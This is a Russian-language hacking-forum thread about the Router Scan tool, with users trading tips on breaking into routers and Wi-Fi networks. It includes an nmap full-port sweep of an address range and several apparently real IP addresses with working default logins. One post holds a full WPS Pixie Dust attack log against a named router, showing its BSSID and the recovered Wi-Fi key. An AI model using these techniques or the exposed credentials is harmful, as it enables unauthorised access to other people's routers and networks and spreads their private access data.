прога Router Scan

Discussion in 'Беспроводные технологии/Wi-Fi/Wardriving' started by СЕРЖ32, 11 Nov 2013.

  1. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,261
    Likes Received:
    8,435
    Reputations:
    111
    Вероятно придётся углублённо исследовать Nmap-ом, может порты нестандартные.
    Эти адреса обычно принадлежат внутренним локальным сетям, так что разные будут.
     
  2. tayerz

    tayerz Member

    Joined:
    31 May 2017
    Messages:
    67
    Likes Received:
    7
    Reputations:
    0
    Какие посоветуете порты?
     
  3. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,261
    Likes Received:
    8,435
    Reputations:
    111
    Ну я обычно заранее не знаю, какие порты, поэтому сканирую все возможные.
    Code:
    nmap -p 0-65535 -T4 -v 100.104.0.0/16
    Статистика по региону скудная, поэтому сложно делать предположения.

    [​IMG]
     
    Alexmeh likes this.
  4. tayerz

    tayerz Member

    Joined:
    31 May 2017
    Messages:
    67
    Likes Received:
    7
    Reputations:
    0
    А можно в целом объяснить, я то я половины не догоняю;)
     
  5. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,261
    Likes Received:
    8,435
    Reputations:
    111
    Ну если в целом, то Nmap это отдельная программа для сканирования IP сетей.
     
  6. tayerz

    tayerz Member

    Joined:
    31 May 2017
    Messages:
    67
    Likes Received:
    7
    Reputations:
    0
    Понял. Буду изучать-пробовать Nmap.
    Спасибо:)
     
  7. СЕРЖ32

    СЕРЖ32 Member

    Joined:
    1 Sep 2013
    Messages:
    1,702
    Likes Received:
    69
    Reputations:
    0
    А что собственно дальше делать,если роутер обнаружен в Locate AP on map?т.е на гугл карте он высвечивается,на какой улице,в каком доме и тд,ну и показывает долготу и широту.Ну я забил в 3 WIFI эти показатели по минимуму,т.е 0.1,показывает несколько или один диапазон,беру больше(0.3-0.5)показывает уже дофига диапазонов.Вот как точно выявить диапазон под конкретный найденый роутер?
     
  8. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,261
    Likes Received:
    8,435
    Reputations:
    111
    Точно выявить будет сложно. Но чем меньше радиус, тем лучше - нужно выбирать золотую середину между радиусом и небольшим кол-вом диапазонов.
    Он здесь! :D
     
    ms13 and Payer like this.
  9. СЕРЖ32

    СЕРЖ32 Member

    Joined:
    1 Sep 2013
    Messages:
    1,702
    Likes Received:
    69
    Reputations:
    0
    да....я тут,я тут просто слежу за вами))
     
    ms13, Payer and binarymaster like this.
  10. СЕРЖ32

    СЕРЖ32 Member

    Joined:
    1 Sep 2013
    Messages:
    1,702
    Likes Received:
    69
    Reputations:
    0
    ну так а если на точке 80 порт выключен,толку сканить тогда....или этот роутер по другим каким то портам можно обнаружить?
     
  11. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,261
    Likes Received:
    8,435
    Reputations:
    111
    Иногда можно по другим - 8080, 1080, 161.

    Но бывает и так, что доступ из WAN закрыт в принципе.
     
  12. СЕРЖ32

    СЕРЖ32 Member

    Joined:
    1 Sep 2013
    Messages:
    1,702
    Likes Received:
    69
    Reputations:
    0
    ну,80,8080 и 1080 так у меня и забиты,161 не забит.что это за порт то,не веб морда же...
     
  13. russstand

    russstand Banned

    Joined:
    5 Jan 2013
    Messages:
    29
    Likes Received:
    1
    Reputations:
    0
    вот такой ответ :(
     
  14. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,261
    Likes Received:
    8,435
    Reputations:
    111
    Веб морды там бывают, как показывает практика.
    Ну всё логично:

    https://forum.antichat.ru/posts/4143320 (5 ответ)
     
    Payer likes this.
  15. gurgen1

    gurgen1 Member

    Joined:
    25 Sep 2017
    Messages:
    36
    Likes Received:
    17
    Reputations:
    0
  16. Pebenok70

    Pebenok70 Member

    Joined:
    5 Jul 2017
    Messages:
    102
    Likes Received:
    96
    Reputations:
    0
    31.181.99.197:80 super:super не парсит. Отдаёт super:super:1K6ACAEO Realtek (QTECH QBR-1), или Seems to be Realtek Wireless Access Point, без авторизации.
    Archer C60 образец не нужен? У них одинаковые прошивки с С59, который уже добавлен.
     
    #4856 Pebenok70, 1 Nov 2017
    Last edited: 1 Nov 2017
  17. Veil

    Veil Banned

    Joined:
    21 May 2015
    Messages:
    2,073
    Likes Received:
    3,416
    Reputations:
    72
    Каких только "ушлых" детей юзеров не бывает.
    Думает скрыться от РоутерСкана?
    Ан нет не уйдешь. Цоп цобе сюда иди.

    [​IMG]
    И вот хотя бы такая польза от антивиря Авира VPN на 500 метров
     
    dragonking, USER_X, sha9 and 8 others like this.
  18. alaa ali

    alaa ali New Member

    Joined:
    2 Nov 2017
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Hello world,
    i want add routerscan list ips : ports
    exmaple :-
    127.0.0.1:80
    127.0.0.2:779
    127.0.0.3:999
    i have many ports please help me
     
  19. Kakoluk

    Kakoluk Well-Known Member

    Joined:
    14 Aug 2015
    Messages:
    641
    Likes Received:
    931
    Reputations:
    7
    Прошу добавить MAC уязвимый к пустому пину.
    ESSID: MTSRouter_4971D2
    BSSID:
    Code:
    94:A7:B7:49:71:D2
    Code:
    [*] Audit started.
    [*] Associating with AP...
    [+] Associated successfully.
    [*] Trying pin "00000000"...
    [*] Sending EAPOL Start...
    [*] Received Identity Request.
    [*] Sending Identity Response...
    [*] Received WPS Message M1.
    [*] Manufacturer: ZTE Corporation
    [*] Model Name: ZXHN H298N
    [*] Model Number: ZXHN H298N
    [*] Serial Number: 123456789012347
    [*] Device Name: ADSL Modem/Router
    [*] Sending WPS Message M2...
    [*] Received WPS Message M3.
    [*] This AP is potentially vulnerable to the "empty string" pin.
    [*] To specify <empty> pin, add empty line to PINs list and disable checksum calculation.
    [*] Also in this case the pin can have two same halfs (e.g. 00000000).
    [*] Sending WPS Message M4...
    [*] Received WPS Message M5.
    [+] First half found: 0000
    [*] Sending WPS Message M6...
    [*] Received WPS Message M5.
    [*] Sending WPS Message M6...
    [*] Received WPS Message M5.
    [*] Sending WPS Message M6...
    [-] Request timed out.
    [*] Sending WPS Message M6...
    [*] Audit stopped.
    [*] Audit started.
    [*] Associating with AP...
    [+] Associated successfully.
    [*] Skipping pin "" (wrong first half)
    [*] Trying pin "12345670"...
    [*] Sending EAPOL Start...
    [*] Received Identity Request.
    [*] Sending Identity Response...
    [*] Received WPS Message M1.
    [*] E-Nonce: 0FF797195E62796710FF59DD4232C3CD
    [*] PKE: D0141B15656E96B85FCEAD2E8E76330D2B1AC1576BB026E7A328C0E1BAF8CF91664371174C08EE12EC92B0519C54879F21255BE5A8770E1FA1880470EF423C90E34D7847A6FCB4924563D1AF1DB0C481EAD9852C519BF1DD429C163951CF69181B132AEA2A3684CAF35BC54ACA1B20C88BB3B7339FF7D56E09139D77F0AC58079097938251DBBE75E86715CC6B7C0CA945FA8DD8D661BEB73B414032798DADEE32B5DD61BF105F18D89217760B75C5D966A5A490472CEBA9E3B4224F3D89FB2B
    [*] Manufacturer: ZTE Corporation
    [*] Model Name: ZXHN H298N
    [*] Model Number: ZXHN H298N
    [*] Serial Number: 123456789012347
    [*] Device Name: ADSL Modem/Router
    [*] Sending WPS Message M2...
    [*] R-Nonce: 04C05DB3C6691D0E4956EA99081E638D
    [*] PKR: 4BF226590448CBD43450681867CD706FE19E156B04502F61290DC1192DA8038226D48B36019B486340499E1BCF498AE039F0CFE8DB736B62EC603F4FB18F33481FB1E0EF6BC7520146B1DC709CD93A5E886524B1F2E5C7C4A6BBA7C19763DC47C51DF6CE9B0619C1AD10B65221BF5878FCD186321F7C36D50D17810E93352167083DB63AC61E3FF779FC0A98C5BD370C4D83CBBFDD775471C6953278C4868993A83D28A64E69F4D6A7626904F034F64306943AD67FCC74FEDFAD1E2D10C42B4B
    [*] AuthKey: EBF1376FA22F3B8963235679817DDE15C0D21169F78E4B8336F6EBE6DBDE2003
    [*] Received WPS Message M3.
    [*] E-Hash1: BC62A23513BA75068D49FF724298FD56066F21A2DB64897AD675A53F6744CC9A
    [*] E-Hash2: BC62A23513BA75068D49FF724298FD56066F21A2DB64897AD675A53F6744CC9A
    [*] Sending WPS Message M4...
    [*] Received WPS Message M5.
    [+] First half found: 1234
    [*] Sending WPS Message M6...
    [*] Received WPS Message M5.
    [*] Sending WPS Message M6...
    [*] Received WPS Message M5.
    [*] Sending WPS Message M6...
    [-] Request timed out.
    [*] Sending WPS Message M6...
    [*] Received Identity Request.
    [-] Request timed out.
    [*] Sending WPS Message M6...
    [*] Received Identity Request.
    [-] Session timed out.
    [*] Starting Pixie Dust attack...
    [*] Mode: 3 (RTL819x)
    [*] PSK1: 97FC09F3DC0F2CBEAA59BFCCA4E98902
    [*] PSK2: 422D7C5B3D86D90EE5A9BB1BFEC4C19F
    [*] E-S1: 0FF797195E62796710FF59DD4232C3CD
    [*] E-S2: 0FF797195E62796710FF59DD4232C3CD
    [+] WPS PIN: <empty>
    [*] Reconnecting...
    [*] Associating with AP...
    [+] Associated successfully.
    [*] Trying pin ""...
    [*] Sending EAPOL Start...
    [*] Received Identity Request.
    [*] Sending Identity Response...
    [*] Received Identity Request.
    [*] Sending Identity Response...
    [*] Received WPS Message M1.
    [*] E-Nonce: 690A2B5316A0E61B45D4FCD5127CF1F3
    [*] PKE: D0141B15656E96B85FCEAD2E8E76330D2B1AC1576BB026E7A328C0E1BAF8CF91664371174C08EE12EC92B0519C54879F21255BE5A8770E1FA1880470EF423C90E34D7847A6FCB4924563D1AF1DB0C481EAD9852C519BF1DD429C163951CF69181B132AEA2A3684CAF35BC54ACA1B20C88BB3B7339FF7D56E09139D77F0AC58079097938251DBBE75E86715CC6B7C0CA945FA8DD8D661BEB73B414032798DADEE32B5DD61BF105F18D89217760B75C5D966A5A490472CEBA9E3B4224F3D89FB2B
    [*] Sending WPS Message M2...
    [*] R-Nonce: C6FB90173F7B221CC91DA3A396E0E9A4
    [*] PKR: 200B2F3C19FDFFB0FC39A5FF7693AA64DA61DB5763CA23C5ABA856E4AB0CD832A1922D327A3F6F3A54E02984A17C2BE3965F01C90E8E3E80A28E3D3E448AEFB604E6B295304A8DEDADA185410E6066C8C96E93EC2EE95B491485086EF1BF3B51474A2AF7AD05FBD2269AB879378BF3402446F9347607D96E20452ADFBBF80EBC58E177AA2D8A9DAF4C267C55C876B9E28C0D6105928A86F30F1E36A10877D7D7515165616AD3C481F609B6DA9803ED103A3FD6CCB714A8B09325849FB1C580FD
    [*] AuthKey: E0B5926E675130CFDD8301B92DFC646981BD94171188716B39A545C8E119C2F9
    [*] Received WPS Message M1.
    [*] E-Nonce: 690A2B5316A0E61B45D4FCD5127CF1F3
    [*] PKE: D0141B15656E96B85FCEAD2E8E76330D2B1AC1576BB026E7A328C0E1BAF8CF91664371174C08EE12EC92B0519C54879F21255BE5A8770E1FA1880470EF423C90E34D7847A6FCB4924563D1AF1DB0C481EAD9852C519BF1DD429C163951CF69181B132AEA2A3684CAF35BC54ACA1B20C88BB3B7339FF7D56E09139D77F0AC58079097938251DBBE75E86715CC6B7C0CA945FA8DD8D661BEB73B414032798DADEE32B5DD61BF105F18D89217760B75C5D966A5A490472CEBA9E3B4224F3D89FB2B
    [*] Sending WPS Message M2...
    [*] R-Nonce: C6FB90173F7B221CC91DA3A396E0E9A4
    [*] PKR: 200B2F3C19FDFFB0FC39A5FF7693AA64DA61DB5763CA23C5ABA856E4AB0CD832A1922D327A3F6F3A54E02984A17C2BE3965F01C90E8E3E80A28E3D3E448AEFB604E6B295304A8DEDADA185410E6066C8C96E93EC2EE95B491485086EF1BF3B51474A2AF7AD05FBD2269AB879378BF3402446F9347607D96E20452ADFBBF80EBC58E177AA2D8A9DAF4C267C55C876B9E28C0D6105928A86F30F1E36A10877D7D7515165616AD3C481F609B6DA9803ED103A3FD6CCB714A8B09325849FB1C580FD
    [*] AuthKey: E0B5926E675130CFDD8301B92DFC646981BD94171188716B39A545C8E119C2F9
    [*] Received WPS Message M3.
    [*] E-Hash1: D9A4A73158C4CF708D01A5491993D6B78A8EE5F1516EAAABE339BD7B828E7C69
    [*] E-Hash2: D9A4A73158C4CF708D01A5491993D6B78A8EE5F1516EAAABE339BD7B828E7C69
    [*] Sending WPS Message M4...
    [*] Received WPS Message M5.
    [+] First half found: <empty>
    [*] Sending WPS Message M6...
    [*] Received WPS Message M7.
    [*] Sending WSC NACK...
    [*] Received Identity Request.
    [-] Request timed out.
    [*] Sending WSC NACK...
    [*] Received Identity Request.
    [-] Request timed out.
    [*] Sending WSC NACK...
    [*] Received Identity Request.
    [-] Session timed out.
    [+] WPS PIN: <empty>
    [+] SSID: MTSRouter_4971D2
    [+] Key: v5h3pruu
    [+] Key Index: 1
    [*] Audit stopped.
    
    Немного напортачил, экспериментируя.
    А можно добавить в лог, MAC устройства которое пытаются отаудитить? :)
    Иногда по запарке(если устройств в работе много), можно забыть его(MAC) сохранить.
     
    sha9, Mednik, CRACK211 and 3 others like this.
  20. Pebenok70

    Pebenok70 Member

    Joined:
    5 Jul 2017
    Messages:
    102
    Likes Received:
    96
    Reputations:
    0
    FAST Wireless N Router FWR310 178.237.183.87:80 admin:admin не парсит у меня. Проверьте.
     
Loading...